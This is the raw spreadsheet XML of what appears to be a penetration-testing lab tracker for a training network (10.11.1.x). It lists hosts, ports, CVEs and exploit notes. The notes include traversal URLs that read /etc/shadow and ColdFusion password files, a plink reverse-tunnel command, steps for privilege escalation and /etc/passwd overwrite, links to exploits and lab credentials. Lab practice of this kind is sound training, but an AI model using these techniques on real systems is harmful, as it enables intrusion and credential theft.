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cp-tag-team\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <bookViews>
    <workbookView xWindow="0" yWindow="0" windowWidth="10800" windowHeight="6612" tabRatio="598"/>
  </bookViews>
  <sheets>
    <sheet name="Windows" sheetId="1" r:id="rId1"/>
    <sheet name="MacOS" sheetId="4" r:id="rId2"/>
    <sheet name="Linux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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="309" uniqueCount="267">
  <si>
    <t>Host</t>
  </si>
  <si>
    <t>OS</t>
  </si>
  <si>
    <t>Vulnerabilities</t>
  </si>
  <si>
    <t>10.11.1.5</t>
  </si>
  <si>
    <t>10.11.1.8</t>
  </si>
  <si>
    <t>10.11.1.10</t>
  </si>
  <si>
    <t>10.11.1.22</t>
  </si>
  <si>
    <t>10.11.1.24</t>
  </si>
  <si>
    <t>10.11.1.31</t>
  </si>
  <si>
    <t>10.11.1.49</t>
  </si>
  <si>
    <t>10.11.1.50</t>
  </si>
  <si>
    <t>10.11.1.73</t>
  </si>
  <si>
    <t>10.11.1.115</t>
  </si>
  <si>
    <t>10.11.1.128</t>
  </si>
  <si>
    <t>10.11.1.136</t>
  </si>
  <si>
    <t>10.11.1.202</t>
  </si>
  <si>
    <t>10.11.1.218</t>
  </si>
  <si>
    <t>10.11.1.220</t>
  </si>
  <si>
    <t>10.11.1.223</t>
  </si>
  <si>
    <t>10.11.1.227</t>
  </si>
  <si>
    <t>10.11.1.229</t>
  </si>
  <si>
    <t>10.11.1.230</t>
  </si>
  <si>
    <t>CVE-2008-4250</t>
  </si>
  <si>
    <t>CVE-2009-3103</t>
  </si>
  <si>
    <t>CVE-2008-4250, CVE-2009-3103</t>
  </si>
  <si>
    <t>CVE-2006-2370</t>
  </si>
  <si>
    <t>regsvc-dos</t>
  </si>
  <si>
    <t>10.11.1.72</t>
  </si>
  <si>
    <t>Open Ports</t>
  </si>
  <si>
    <t>SMB</t>
  </si>
  <si>
    <t>SMB, Web</t>
  </si>
  <si>
    <t>139, 445, 80</t>
  </si>
  <si>
    <t>10.11.1.13</t>
  </si>
  <si>
    <t>10.11.1.14</t>
  </si>
  <si>
    <t>10.11.1.39</t>
  </si>
  <si>
    <t>10.11.1.71</t>
  </si>
  <si>
    <t>10.11.1.116</t>
  </si>
  <si>
    <t>10.11.1.133</t>
  </si>
  <si>
    <t>10.11.1.209</t>
  </si>
  <si>
    <t>10.11.1.217</t>
  </si>
  <si>
    <t>10.11.1.219</t>
  </si>
  <si>
    <t>10.11.1.234</t>
  </si>
  <si>
    <t>10.11.1.237</t>
  </si>
  <si>
    <t>10.11.1.238</t>
  </si>
  <si>
    <t>10.11.1.251</t>
  </si>
  <si>
    <t>Apache web server</t>
  </si>
  <si>
    <t>SMB, web (ecommerce page)</t>
  </si>
  <si>
    <t>Mail Server, Apache Web, SNMP</t>
  </si>
  <si>
    <t>SMB, bethany's web page, SNMP</t>
  </si>
  <si>
    <t>SMB, SNMP</t>
  </si>
  <si>
    <t>80, 161</t>
  </si>
  <si>
    <t>Windows 2000</t>
  </si>
  <si>
    <t>Running Services</t>
  </si>
  <si>
    <t>Installed Apps</t>
  </si>
  <si>
    <t>Python, SQL Server 2000, Data Access Components, Windows installer 3.1, VNC Server 4.1.1, winrar archiver, visual c++, webfldrs</t>
  </si>
  <si>
    <t>21, 139, 445, 25, 80, 161, 443, 445, 1025, 1026, 1029, 3372, 5800, 5900, 135</t>
  </si>
  <si>
    <t>Mail Server, index page with listed pages
 (ASP.net), SNMP,</t>
  </si>
  <si>
    <t>Plan of attack</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">CVE-2008-4250, </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>CVE-2009-1925</t>
    </r>
  </si>
  <si>
    <t>VNC, anonymous ftp</t>
  </si>
  <si>
    <t>Got in with Null Session, Mail Server, 
Apache web with listed pages, SNMP,  IIS, VNC, msrpc, anonymous FTP</t>
  </si>
  <si>
    <t>21,22, 25, 80, 161</t>
  </si>
  <si>
    <t>21,  80, 161</t>
  </si>
  <si>
    <t>22, 80</t>
  </si>
  <si>
    <t>10.11.1.125</t>
  </si>
  <si>
    <t>21,  22</t>
  </si>
  <si>
    <t>21, 139, 25, 80, 161</t>
  </si>
  <si>
    <t>22, 80, 161</t>
  </si>
  <si>
    <t>Exploited?</t>
  </si>
  <si>
    <t>Exploit notes</t>
  </si>
  <si>
    <t>ms09_053_ftpd_nlst</t>
  </si>
  <si>
    <t>Linux?</t>
  </si>
  <si>
    <t>Per forum, enumeration is the key. Doing enum4linux, etc.</t>
  </si>
  <si>
    <t>21, 139,445, 25, 80, 161, 135, 443, 445, 1025, 1026, 1029, 3372, 5800, 5900</t>
  </si>
  <si>
    <t>mail server: dj.acme.local
sql server listening on 27900</t>
  </si>
  <si>
    <t>22, 113, 139, 445</t>
  </si>
  <si>
    <t>Linux</t>
  </si>
  <si>
    <t>File Shares?</t>
  </si>
  <si>
    <t>sql injection! Got privileged shell. Still need to find proof.txt</t>
  </si>
  <si>
    <t>Openf nasty exploit</t>
  </si>
  <si>
    <t>Femitter FTP service.</t>
  </si>
  <si>
    <t>FTP</t>
  </si>
  <si>
    <t>0x73 (had to tweak code a bit - downloading dependencies locally). This got me shell as Apache user.
Next step was to load the ptrace-kmod.c exploit onto the box in order to escalate to root.
Have to transfer source for ptrace (not compiled!) via Apache download from my machine. 
Then on 22 run export PATH=$PATH:/usr/bin
Then on 22 run gcc -o p ptrace-kmod.c
then ./p</t>
  </si>
  <si>
    <t>LAMP, Apache 2.4.7 on Ubuntu
PHP 5.5.9
Big Tree CMS &lt; 4.2.17</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Tree Site
Hidden login page at core/admin/modules/login/default.php
Tiny MCE (vulnerable?)
</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>Nikto scan shows shellshock vuln</t>
    </r>
  </si>
  <si>
    <t>Shellshock</t>
  </si>
  <si>
    <t>Easy peasy with msf shellshock: apache_mod_cgi_bash_env_exec)</t>
  </si>
  <si>
    <t>CentOS</t>
  </si>
  <si>
    <t>135, 139, 445, 1025</t>
  </si>
  <si>
    <t>Name</t>
  </si>
  <si>
    <t>Alice</t>
  </si>
  <si>
    <t>Phoenix</t>
  </si>
  <si>
    <t>Alpha</t>
  </si>
  <si>
    <t>Windows XP 5.1</t>
  </si>
  <si>
    <t>Anon FTP allowed
HTTP Put method allowed</t>
  </si>
  <si>
    <t>Web, SNMP, IIS 5.1</t>
  </si>
  <si>
    <t>ColdFusion 4.5.1</t>
  </si>
  <si>
    <t>CVE-2000-0538</t>
  </si>
  <si>
    <t>Ubuntu</t>
  </si>
  <si>
    <t xml:space="preserve">22,110, 139, 143, 445, 80, 993, 995, </t>
  </si>
  <si>
    <t>Payday</t>
  </si>
  <si>
    <t>21, 80, 3389</t>
  </si>
  <si>
    <t>MacOS</t>
  </si>
  <si>
    <t>Web, Microsoft Terminal Services</t>
  </si>
  <si>
    <t>135, 139, 445, 80, 1025, 1433, 3389</t>
  </si>
  <si>
    <t>Ralph</t>
  </si>
  <si>
    <t>SQL Server 2000 8.0 sp3
Microsoft Terminal Services
IIS 6.0</t>
  </si>
  <si>
    <t>SMB, some sort of login page
10.11.1.31/_vti_pvt/access.cnf - pwd data
Microsoft FrontPage 5.0.2.6738</t>
  </si>
  <si>
    <t>Windows 2003 3790 SP1</t>
  </si>
  <si>
    <t>IIS 8.5, Drupal 7</t>
  </si>
  <si>
    <t>80, 135, 139, 161, 49155</t>
  </si>
  <si>
    <t>CVE-2012-0152 (DOS)
CVE-2012-0002 (Exec)
 -- this is a buffer overflow</t>
  </si>
  <si>
    <t>80, 135, 139, 49155</t>
  </si>
  <si>
    <t>135, 139, 445, 554, 1100, 2869, 3389, 5357, 5900, 8080, 10243, 49152-7</t>
  </si>
  <si>
    <t>Java RMI Registry
Microsoft HTTPAPI 2.0
MySQL?
TightVNC, 
Apache 2.4.9 (IP based access)
PHP 5.5.12</t>
  </si>
  <si>
    <t>VNC,
10.11.1.73:8080/PHP/</t>
  </si>
  <si>
    <t>21, 135, 139, 443, 445, 80, 1030-8, 1521, 2030, 2100, 3372, 3389, 4443, 7778</t>
  </si>
  <si>
    <t>ACME</t>
  </si>
  <si>
    <t>Apache 1.3.22 (with Oracle)
mod_plsql 3.0.8.8.3b
mod_ssl 2.8.5
openssl 0.9.6
mod_fastcgi 2.2.12
mod_oprocmgr 1.0
mod_perl 1.25
Oracle: acme, acmexdb</t>
  </si>
  <si>
    <t>Observer</t>
  </si>
  <si>
    <t>135, 139, 445</t>
  </si>
  <si>
    <t>21, 53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 3389, 49152-165</t>
  </si>
  <si>
    <t>Master</t>
  </si>
  <si>
    <t>FTP, SMB</t>
  </si>
  <si>
    <t>Anon FTP allowed
HTTP Put method allowed
RDP Webpage at /tsweb</t>
  </si>
  <si>
    <t>Windows XP 5.1 SP1</t>
  </si>
  <si>
    <t>Bob</t>
  </si>
  <si>
    <t>Centos</t>
  </si>
  <si>
    <t>22, 80, 3306</t>
  </si>
  <si>
    <t>MySQL
OTRS 5
nginx 1.6.3
OpenSSH 6.6.1</t>
  </si>
  <si>
    <t>OpenSSH 5.8p1
James smtpd 2.3.2
Apache 2.2.20
James Pop3 2.3.2</t>
  </si>
  <si>
    <t>22, 80, 119, 2049, 4555, 41829, 42913, 46021, 46401, 48758</t>
  </si>
  <si>
    <t>Maybe can exploit NFS - lots of mounts here</t>
  </si>
  <si>
    <t>21,22, 25, 80, 139, 143, 199, 443, 3306, 32768</t>
  </si>
  <si>
    <t>Tophat</t>
  </si>
  <si>
    <t>Anonymous FTP allowed
http://10.11.1.115/webmail/src/read_body.php</t>
  </si>
  <si>
    <t>sshv1
Apache 2.0.40
imap 2001.315 rh
linux snmp multiplexer
SquirrelMail 1.2.10
webalizer 2.0.1
vsftpd 1.1.3</t>
  </si>
  <si>
    <t>Red Hat 9</t>
  </si>
  <si>
    <t>Run script from exploit.db to create the ../ user
Don't need to connect via SSH, just connect via Pop port</t>
  </si>
  <si>
    <t>10.11.1.44</t>
  </si>
  <si>
    <t>1. Get low privilege shell with asp reverse shell.
2. Per Forum, accesschk.exe important for PE
 - find correct version (5.0)
 - ftp over (using binary setting)
  - append -accepteula to each command
3. Per forum need to find service with poor security to overwrite and exploit
4. Per Phillip, run netstat -ano</t>
  </si>
  <si>
    <t>1. Phillip stated that port 445 vulnerable to ms08_067_netapi
2. Modify /etc/ssh/ssh_config to allow tunneling
3. With low priv shell, upload plink.exe to victim
4. plink -l root -pw **** 10.11.0.X -R 3333:127.0.0.1:445
5. In msf, run exploit</t>
  </si>
  <si>
    <t>Apache Tomcat/Coyote on 8080</t>
  </si>
  <si>
    <t>https://charlesreid1.com/wiki/Metasploitable/Apache/Tomcat_and_Coyote</t>
  </si>
  <si>
    <t>ancient apache on 7778
apache_chunked exploit
SMB vuln
Phillip got into oracle</t>
  </si>
  <si>
    <t>21,22,80,110, 143, 3306</t>
  </si>
  <si>
    <t>Jeff</t>
  </si>
  <si>
    <t>XSS</t>
  </si>
  <si>
    <t>Dotty</t>
  </si>
  <si>
    <t>PHPadminlite - password is admin
https://www.exploit-db.com/exploits/24044/
https://www.exploit-db.com/exploits/25971/
https://www.exploit-db.com/exploits/26368/</t>
  </si>
  <si>
    <t xml:space="preserve">135, 139, 443, 80, 445, 3306, 3389, 49152-7, </t>
  </si>
  <si>
    <t>play with offsec team login page (malicious??)
/index/ page - another login</t>
  </si>
  <si>
    <t>10.11.1.7</t>
  </si>
  <si>
    <t>Windows</t>
  </si>
  <si>
    <t>3389, 161</t>
  </si>
  <si>
    <t>Bob2</t>
  </si>
  <si>
    <t>1.Anon FTP allowed
2. SMB config allows brute forcing of passwords
3. Port 631 allows put</t>
  </si>
  <si>
    <t>21, 22, 139, 445, 80, 631, 3306</t>
  </si>
  <si>
    <t>Apache 2.0.52 (vulnerable)
10.11.1.8/internal - vuln form?
PHP
CUPS 1.1 Http server (port 631)
MySQL</t>
  </si>
  <si>
    <t>1. Get basic shell through RFI exploit on Advanced Comment System (note - gotta connect on port 443 or get stuck behind dumb firewall).
2. PE with CUPS 1.1 exploit didn't work.
3. linux-send page - found exploit based on linux kernel and release name.</t>
  </si>
  <si>
    <t xml:space="preserve">1. May have openf vuln (trying since I have it already)
2. Squirrelmail - all exploits seem to need creds
3. Webalizer has Stored XSS vuln
</t>
  </si>
  <si>
    <t>Forum said to look at versions in enum4linux output. Samba 2.2.7a!
https://www.exploit-db.com/exploits/10/
./exploit -b 0 IP
apparently I can find more subnets from this one. Phillip? :)</t>
  </si>
  <si>
    <t>Sufferance</t>
  </si>
  <si>
    <t>Barry</t>
  </si>
  <si>
    <t>22, 8000</t>
  </si>
  <si>
    <t xml:space="preserve">/otrs/index.pl. 
Per the forum, need to guess username and pasword based on manual.  http://doc.otrs.com/doc/manual/admin/5.0/en/html/web-installer.html
root@localhost. Pwd: otrs
Next, get a shell by uploading package via Admin Package manager. https://www.snip2code.com/Snippet/1822916/OTRS-OPM-backdoored-Package-with-Reverse
edit /etc/passwd and put in a hashed password where the "x" is after root.
Create hashed/salted password with this: openssl passwd -1 -salt xyz  yourpass </t>
  </si>
  <si>
    <t>leftturn</t>
  </si>
  <si>
    <t>Tricia</t>
  </si>
  <si>
    <t>10.11.1.141</t>
  </si>
  <si>
    <t>22, 111, 10000</t>
  </si>
  <si>
    <t>ProFTPD 1.3.3a
OpenSSH 5.5p1 Debian 6</t>
  </si>
  <si>
    <t>22, 25, 80, 110, 111, 143, 443, 993, 995, 3306, 4445</t>
  </si>
  <si>
    <t>OpenSSH 4.3
Mail server with VRFY enabled
Apache 2.2.3</t>
  </si>
  <si>
    <t>Centos 5
238.12.1.el5</t>
  </si>
  <si>
    <t>Elastix 2.2.0 web app. Got in with admin/admin
RoundCube Mail 0.3.1
freePBX 2.8.1
postfix 2.3.3
cyrus-imapd 2.3.7
Asterisk 1.8.7.0
hylafax 4.3.10</t>
  </si>
  <si>
    <t>https://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/
Or LFI: https://www.exploit-db.com/exploits/37637/
This one worked - easy! https://www.exploit-db.com/exploits/18650/</t>
  </si>
  <si>
    <t>More on nmap --interactive: https://gist.github.com/dergachev/7916152
Also - I had to go into Elastix app and associate extension 1000 with admin user (under PBX/voicemail option).</t>
  </si>
  <si>
    <t>10.11.1.226</t>
  </si>
  <si>
    <t>Both FTP products have buffer overflow issues.
Forum indicates AT-FTPd can be pwned via metasploit (but might have to revert machine first since flaky)</t>
  </si>
  <si>
    <t>Explorer?</t>
  </si>
  <si>
    <t>Lifted a couple of private keys from windows/freesshd directory</t>
  </si>
  <si>
    <t>21, 23, 1720, 60000</t>
  </si>
  <si>
    <t>Guild FTPd
AT-TFTP (vuln)
FreeSSHd
Python 2.6
GnuWin32</t>
  </si>
  <si>
    <t>Windows 2003</t>
  </si>
  <si>
    <t>OpenSSH 5.3p1
Apache 2.2.14
PHP 5.3.2
XML-RPC
Wordpress 3.5.1</t>
  </si>
  <si>
    <t>This looks promising: http://www.securityfocus.com/bid/14088/exploit
Or https://www.exploit-db.com/exploits/23856/ - no luck yet.
Let's try this: https://www.exploit-db.com/exploits/39891/
Brute forced Wordpress pwd with msf (admin/princess)</t>
  </si>
  <si>
    <t xml:space="preserve">Debian 3ubuntu3
2.6.32-21-generica-pae
Ubuntu 10.04 LTS(lucid) </t>
  </si>
  <si>
    <t xml:space="preserve">
This worked! http://www.r00tsec.com/2015/08/howto-create-backdoor-in-wordpress.html
Use this for PE: https://www.exploit-db.com/exploits/15704/
Found info on other networks. See nina.html</t>
  </si>
  <si>
    <t>Nina</t>
  </si>
  <si>
    <t>22, 80, 111, 443</t>
  </si>
  <si>
    <t>Apache 2.2.22
rpcbind 2.2
openSSH 6.0p1</t>
  </si>
  <si>
    <t>https://10.11.1.237/test
/web1</t>
  </si>
  <si>
    <t>Webdav has been installed as per these instructions: https://www.howtoforge.com/setting-up-webdav-with-apache2-on-debian-etch
Got htpasswd file. Going to try to decrypt with John.</t>
  </si>
  <si>
    <t>10.11.1.221</t>
  </si>
  <si>
    <t>edbmachine</t>
  </si>
  <si>
    <t>OpenSSH 5.1
Apache 2.2.11
PHP 5.2.6-3Ubuntu4.4
Wordpress 2.8.6
MySQL 5</t>
  </si>
  <si>
    <t>Ubuntu 9.04 (Jaunty Jackalope)
2.6.28-11-generic</t>
  </si>
  <si>
    <t>Using wpscan to try and exploit old WP instance
Looks like sqli is the way in
Cracked password for mysql db: root:toor
Cracked password for wordpress is ????? (via John).
Can upload shell via plugins, but Phil says easier way. Just SSH right in as sean with ?????
Just overwrite /etc/passwd again
Wordpress Pingback Port scanner might be important</t>
  </si>
  <si>
    <t>192.168.1.7</t>
  </si>
  <si>
    <t>192.168.1.217</t>
  </si>
  <si>
    <t>21, 22, 80, 443</t>
  </si>
  <si>
    <t>PureFTPd</t>
  </si>
  <si>
    <t>10.1.1.1</t>
  </si>
  <si>
    <t>10.1.1.223</t>
  </si>
  <si>
    <t>22, 80, 222, 10000</t>
  </si>
  <si>
    <t>80, 135, 139, 443, 445, 3306, 3389, 49152-7</t>
  </si>
  <si>
    <t>10.1.1.224</t>
  </si>
  <si>
    <t>10.1.1.230</t>
  </si>
  <si>
    <t>joe</t>
  </si>
  <si>
    <t>niky.it.thinc</t>
  </si>
  <si>
    <t>10.1.1.226</t>
  </si>
  <si>
    <t>jeff</t>
  </si>
  <si>
    <t>kevin.thinc</t>
  </si>
  <si>
    <t>21, 135, 139, 445, 1025, 3389</t>
  </si>
  <si>
    <t>135, 139, 445, 3389, 49152-7</t>
  </si>
  <si>
    <t>10.1.1.235</t>
  </si>
  <si>
    <t>nina</t>
  </si>
  <si>
    <t>10.1.1.236</t>
  </si>
  <si>
    <t>carrie</t>
  </si>
  <si>
    <t>22, 25, 53, 80, 111, 50001</t>
  </si>
  <si>
    <t>10.1.1.246</t>
  </si>
  <si>
    <t>sean.it.thinc</t>
  </si>
  <si>
    <t>10.1.1.247</t>
  </si>
  <si>
    <t>cory</t>
  </si>
  <si>
    <t>_</t>
  </si>
  <si>
    <t>10.1.1.254</t>
  </si>
  <si>
    <t>53, 8080</t>
  </si>
  <si>
    <t>10.1.1.248</t>
  </si>
  <si>
    <t>Apache 
Apache 2.2.9 on port 10000
 - mod_python 3.3.1
 - Python 2.5.2
 - mod_perl 2.0.4
 - PHP 5.2.6</t>
  </si>
  <si>
    <t>Humble</t>
  </si>
  <si>
    <t>Humble 2</t>
  </si>
  <si>
    <t>OpenSSH 5.3p1
Rocket httpd 1.2.6
Python 2.6.5
web2py framework</t>
  </si>
  <si>
    <t>https://10.11.1.44:8000/
https://10.11.1.44:8000/admin</t>
  </si>
  <si>
    <t>Can maybe brute force web2py admin login from 251 (must be from same network).</t>
  </si>
  <si>
    <t>Apache 2.2.4
 - mod_netogiation module allows easy brute forcing of directory names
PHP 5.2.3
possible xss
App may be very vulnerable
CS-Cart 1.3.3
FCKEditor 2.2</t>
  </si>
  <si>
    <t>Login to CS-Cart as admin/admin
Might be able to do something with this: http://10.11.1.24/classes/fckeditor/editor/filemanager/browser/default/connectors/test.html#
File traversal: http://10.11.1.24/classes/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&amp;Connector=../../connectors/php/connector.php</t>
  </si>
  <si>
    <t>Used this exploit to output /etc/passwd: http://blog.portswigger.net/2015/08/server-side-template-injection.html
Then logged in as patrick/patrick
then sudo -s</t>
  </si>
  <si>
    <t>Got /etc/shadow via file traversal issue: http://10.11.1.141:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/etc/shadow</t>
  </si>
  <si>
    <t>Linux fc4.thinc.local 2.6.11-1.1369_FC4
Fedora Core release 4 (Stentz)
LSB_VERSION="1.3"</t>
  </si>
  <si>
    <t>Brute forced login with John (use syntax from course PDF!!!)
Going to try DirtyCow for exploit</t>
  </si>
  <si>
    <t>fc4.thinc.local</t>
  </si>
  <si>
    <t xml:space="preserve">/licenses gives a list of all software installed
Per Phillip and Forum, XSS (possibly with Beef) is way to go
Through Jeff, I can get Nicky (client side exploit). </t>
  </si>
  <si>
    <t>For PE - log in as Bob. 
Upload reverse shell (pl - modify file extension to .cgi)
Browse to file using same webmin traversal bug</t>
  </si>
  <si>
    <t>CVE-2012-0002</t>
  </si>
  <si>
    <t>RDP</t>
  </si>
  <si>
    <t>Looks like I need to modify the exploit to do RCE instead of DOS
Forum says you need mailman/postman first</t>
  </si>
  <si>
    <t>Microsoft IIS httpd 6.0
Adobe ColdFusion 8 Enterprise
Adobe BlazeDS</t>
  </si>
  <si>
    <t>Get encrypted pwd here: http://10.11.1.10/CFIDE/administrator/enter.cfm?locale=..\..\..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties%00en
Google result and get password (pass123)
Create a utility to execute system commands:
https://jumpespjump.blogspot.com/2014/03/attacking-adobe-coldfusion.html
Modify it to include an upload function: http://www.pwnag3.com/2013/04/coldfusion-for-pentesters-part-2.html</t>
  </si>
  <si>
    <t>mike.thinc.local</t>
  </si>
  <si>
    <t>Bethany</t>
  </si>
  <si>
    <t>SMB, bethany's web page, SNMP, RPC
Drupal 7.28</t>
  </si>
  <si>
    <t>Bethany2</t>
  </si>
  <si>
    <t>Gamma</t>
  </si>
  <si>
    <t>Windows 7 Professional 7601 Service Pack 1</t>
  </si>
  <si>
    <t>Users: jill, Guest, admin, Administrator, HomeGroupUser</t>
  </si>
  <si>
    <t>Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)       
TightVNC
Apache httpd 2.4.9
PHP/5.5.12
MySQL
WampServer 2.5</t>
  </si>
  <si>
    <t>Kevin</t>
  </si>
  <si>
    <t>Windows 7 Ultimate N 7600</t>
  </si>
  <si>
    <t>GoAhead WebServer
SMB
RPC
HP Power Manager</t>
  </si>
  <si>
    <t>Got in with admin/admin</t>
  </si>
  <si>
    <t>Easy peasy exploit with metasploit
hp_power_manager_filename</t>
  </si>
  <si>
    <t>exploit femitter, traverse directories
Browse to ftp://10.11.1.125/\..
Traverse using this pattern:  
Run a broader nmap on this one
ftp://10.11.1.125/../../../Windows/System32/eula.txt</t>
  </si>
  <si>
    <t>WINDOWS XP ÉDITION PROFESSIONNEL AVEC LE 
LOGICIEL SERVICE PACK 3</t>
  </si>
  <si>
    <t>Sherlock</t>
  </si>
  <si>
    <t>https://www.gracefulsecurity.com/path-traversal-cheat-sheet-windows/</t>
  </si>
  <si>
    <t>Front Page
PHP 5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</si>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</sst>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72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0" fillId="0" borderId="0" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="4" fillId="0" borderId="1" xfId="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="1" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="3" fillId="3" borderId="1" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="1" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="2" xfId="0" applyFill="1" applyBorder="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1"/>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFill="1" applyBorder="1"/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racefulsecurity.com/path-traversal-cheat-sheet-window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0.11.1.44:8000/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://10.11.1.237/test/we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12" workbookViewId="0">
      <pane xSplit="1" topLeftCell="B1" activePane="topRight" state="frozen"/>
      <selection pane="topRight" activeCell="A16" sqref="A16"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="14.4" x14ac:dyDescent="0.3"/>
  <cols>
    <col min="1" max="1" width="10.109375" bestFit="1" customWidth="1"/>
    <col min="2" max="2" width="17.5546875" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="13.109375" bestFit="1" customWidth="1"/>
    <col min="4" max="4" width="20.5546875" customWidth="1"/>
    <col min="5" max="5" width="29.88671875" bestFit="1" customWidth="1"/>
    <col min="6" max="7" width="33.77734375" customWidth="1"/>
    <col min="8" max="8" width="33.109375" customWidth="1"/>
    <col min="9" max="9" width="22.6640625" customWidth="1"/>
    <col min="10" max="10" width="9.6640625" bestFit="1" customWidth="1"/>
    <col min="11" max="11" width="21.21875" customWidth="1"/>
    <col min="12" max="12" width="0.21875" customWidth="1"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:12" x14ac:dyDescent="0.3">
      <c r="A1" s="2" t="s">
        <v>0</v>
      </c>
      <c r="B1" s="2" t="s">
        <v>1</v>
      </c>
      <c r="C1" s="2" t="s">
        <v>89</v>
      </c>
      <c r="D1" s="2" t="s">
        <v>2</v>
      </c>
      <c r="E1" s="2" t="s">
        <v>28</v>
      </c>
      <c r="F1" s="2" t="s">
        <v>52</v>
      </c>
      <c r="G1" s="2"/>
      <c r="H1" s="2" t="s">
        <v>53</v>
      </c>
      <c r="I1" s="2" t="s">
        <v>57</v>
      </c>
      <c r="J1" s="2" t="s">
        <v>68</v>
      </c>
      <c r="K1" s="2" t="s">
        <v>69</v>
      </c>
    </row>
    <row r="2" spans="1:12" x14ac:dyDescent="0.3">
      <c r="A2" t="s">
        <v>3</v>
      </c>
      <c r="B2" t="s">
        <v>93</v>
      </c>
      <c r="C2" t="s">
        <v>90</v>
      </c>
      <c r="D2" t="s">
        <v>22</v>
      </c>
      <c r="E2" t="s">
        <v>88</v>
      </c>
      <c r="F2" t="s">
        <v>29</v>
      </c>
      <c r="L2" s="3"/>
    </row>
    <row r="3" spans="1:12" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A3" t="s">
        <v>152</v>
      </c>
      <c r="B3" t="s">
        <v>153</v>
      </c>
      <c r="D3" t="s">
        <v>243</v>
      </c>
      <c r="E3" t="s">
        <v>154</v>
      </c>
      <c r="F3" t="s">
        <v>244</v>
      </c>
      <c r="I3" s="1" t="s">
        <v>245</v>
      </c>
      <c r="L3" s="3"/>
    </row>
    <row r="4" spans="1:12" s="13" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A4" s="13" t="s">
        <v>5</v>
      </c>
      <c r="B4" s="13" t="s">
        <v>153</v>
      </c>
      <c r="C4" s="13" t="s">
        <v>248</v>
      </c>
      <c r="D4" s="13" t="s">
        <v>97</v>
      </c>
      <c r="E4" s="13">
        <v>80</v>
      </c>
      <c r="F4" s="13" t="s">
        <v>246</v>
      </c>
      <c r="H4" s="13" t="s">
        <v>96</v>
      </c>
      <c r="I4" s="13" t="s">
        <v>247</v>
      </c>
      <c r="J4" s="13">
        <v>1</v>
      </c>
      <c r="L4" s="19"/>
    </row>
    <row r="5" spans="1:12" s="24" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A5" s="27" t="s">
        <v>32</v>
      </c>
      <c r="B5" s="27" t="s">
        <v>125</v>
      </c>
      <c r="C5" s="27" t="s">
        <v>126</v>
      </c>
      <c r="D5" s="27"/>
      <c r="E5" s="27" t="s">
        <v>62</v>
      </c>
      <c r="F5" s="27" t="s">
        <v>95</v>
      </c>
      <c r="G5" s="27"/>
      <c r="H5" s="27" t="s">
        <v>124</v>
      </c>
      <c r="I5" s="27" t="s">
        <v>140</v>
      </c>
      <c r="J5" s="24">
        <v>1</v>
      </c>
      <c r="K5" s="24" t="s">
        <v>141</v>
      </c>
      <c r="L5" s="28"/>
    </row>
    <row r="6" spans="1:12" s="14" customFormat="1" x14ac:dyDescent="0.3">
      <c r="A6" s="14" t="s">
        <v>33</v>
      </c>
      <c r="C6" s="14" t="s">
        <v>155</v>
      </c>
      <c r="E6" s="14">
        <v>161</v>
      </c>
      <c r="H6" s="15"/>
      <c r="I6" s="15"/>
      <c r="K6" s="15"/>
      <c r="L6" s="16"/>
    </row>
    <row r="7" spans="1:12" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A7" t="s">
        <v>8</v>
      </c>
      <c r="B7" s="1" t="s">
        <v>108</v>
      </c>
      <c r="C7" t="s">
        <v>105</v>
      </c>
      <c r="D7" s="1" t="s">
        <v>111</v>
      </c>
      <c r="E7" t="s">
        <v>104</v>
      </c>
      <c r="F7" s="1" t="s">
        <v>107</v>
      </c>
      <c r="G7" s="1"/>
      <c r="H7" s="1" t="s">
        <v>106</v>
      </c>
      <c r="L7" s="3"/>
    </row>
    <row r="8" spans="1:12" ht="28.8" x14ac:dyDescent="0.3">
      <c r="A8" t="s">
        <v>9</v>
      </c>
      <c r="C8" s="29" t="s">
        <v>249</v>
      </c>
